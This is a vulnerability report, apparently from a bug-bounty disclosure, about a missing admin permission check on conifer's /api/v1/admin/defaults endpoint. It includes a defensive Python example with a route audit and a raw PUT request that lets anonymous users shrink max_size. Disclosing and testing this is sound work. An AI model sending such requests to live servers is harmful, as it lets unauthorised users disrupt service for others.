Improper Privilege Management in rhizome-conifer/conifer
Reported on
Feb 17th 2022
Description
In admincontroller.py, every API handler performs a user permission check through the admin_view function to block access by low-privileged users. However, this check is not applied to the /api/v1/admin/defaults endpoint. Anonymous users can therefore change the max_size configuration, which prevents other users from creating records.
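The following is an added example, not code from the conifer project: it models the pattern the description names, an admin_view decorator that guards every admin handler except one, with the unguarded handler beside its guarded form, and a small route audit that lists admin-prefixed paths whose handler lacks the guard. The User, Settings and route-registry types, the admin_guarded attribute and the handler names are assumptions made for the example; the request body and the 500000000 default come from the report.

```python
"""Added example (not conifer's own code): a missing admin_view check on one admin route."""
from dataclasses import dataclass
from functools import wraps
from typing import Optional


class Forbidden(Exception):
    """Raised when a non-admin caller reaches an admin-only handler."""


@dataclass
class User:
    name: Optional[str]   # None models an anonymous (unauthenticated) request
    role: str = "user"

    @property
    def is_admin(self) -> bool:
        return self.name is not None and self.role == "admin"


@dataclass
class Settings:
    max_size: int = 500_000_000        # default reported in Step 1
    max_anon_size: int = 500_000_000


def admin_view(func):
    """Hypothetical stand-in for conifer's admin_view: refuse any non-admin caller."""
    @wraps(func)
    def wrapper(user, *args, **kwargs):
        if not user.is_admin:
            raise Forbidden(f"{func.__name__} requires an admin account")
        return func(user, *args, **kwargs)
    wrapper.admin_guarded = True        # marker the route audit below looks for
    return wrapper


def _apply_defaults(settings, body):
    # Shared body: parse and validate the two limits, then store them.
    new_max = int(body["max_size"])
    new_anon = int(body["max_anon_size"])
    if new_max <= 0 or new_anon <= 0:
        raise ValueError("limits must be positive")
    settings.max_size = new_max
    settings.max_anon_size = new_anon
    return settings


def update_defaults_unguarded(user, settings, body):
    """Vulnerable shape: no permission check, so an anonymous PUT changes the limits."""
    return _apply_defaults(settings, body)


@admin_view
def update_defaults_guarded(user, settings, body):
    """Hardened shape: identical body, but admin_view rejects non-admin callers first."""
    return _apply_defaults(settings, body)


@admin_view
def list_users_guarded(user, settings, body):
    """Another admin route, already guarded, to give the audit something to pass."""
    return settings


ADMIN_PREFIX = "/api/v1/admin/"


def unguarded_admin_routes(routes):
    """Return admin-prefixed paths whose handler was not wrapped by admin_view.

    `routes` maps a path to its handler; this is the check a reviewer would run
    over the route table to catch exactly the gap described in the report.
    """
    return sorted(path for path, handler in routes.items()
                  if path.startswith(ADMIN_PREFIX)
                  and not getattr(handler, "admin_guarded", False))


# Constructed route tables: before and after the fix.
ROUTES_BEFORE = {"/api/v1/admin/users": list_users_guarded,
                 "/api/v1/admin/defaults": update_defaults_unguarded}
ROUTES_AFTER = {"/api/v1/admin/users": list_users_guarded,
                "/api/v1/admin/defaults": update_defaults_guarded}

# Request body from the report's Step 2.
BODY = {"max_size": "1000", "max_anon_size": "1000"}
ANON = User(name=None)


def anonymous_put_outcome(handler):
    """Run the Step 2 request as an anonymous user; return the resulting max_size."""
    settings = Settings()
    try:
        handler(ANON, settings, BODY)
    except Forbidden:
        pass                            # rejected: settings stay untouched
    return settings.max_size


if __name__ == "__main__":
    print("unguarded before fix:", unguarded_admin_routes(ROUTES_BEFORE))
    print("anonymous PUT, unguarded handler -> max_size =", anonymous_put_outcome(update_defaults_unguarded))
    print("anonymous PUT, guarded handler   -> max_size =", anonymous_put_outcome(update_defaults_guarded))
```

The audit keys off an attribute the decorator sets, so any route that forgets the decorator shows up by name; wiring a check like unguarded_admin_routes into a unit test is a cheap way to keep one forgotten endpoint from reopening the same hole.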
Proof of Concept
- Step 1: First, I create two accounts asdmigs78j56436 and asdmigs78j56436. When retrieving information from the API /api/v1/auth/curr_user, the value of max_size variable is 500000000.
- Step 2: Set value for max_size via API /api/v1/admin/defaults
PUT /api/v1/admin/defaults HTTP/2
Host: conifer.rhizome.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 56
Connection: close
{"max_size":"1000",
"max_anon_size":"1000"}
- Step 3: Create a new account asdmigs78j56437. When retrieving information from the API /api/v1/auth/curr_user, the value of the max_size variable is 1000. When creating a new record, you will very quickly reach the maximum limit.
Note: I adjusted max_size back to the original value of 500000000.
- PoC:
Real max_size: https://drive.google.com/file/d/1JEo6MY-TGEfAUSalQwzegpOlbyukaF7p/view?usp=sharing
Change max_size: https://drive.google.com/file/d/1kfHhIDnC-coQ_AjZzRG5uY8PfYVjRpmU/view?usp=sharing
Reach limit: https://drive.google.com/file/d/1bMVclDzfQzsnzPIOeazC_zn7s2N7ka0r/view?usp=sharing
Impact
Improper Privilege Management. Anonymous users can change max_size configuration which prevents other users from creating records.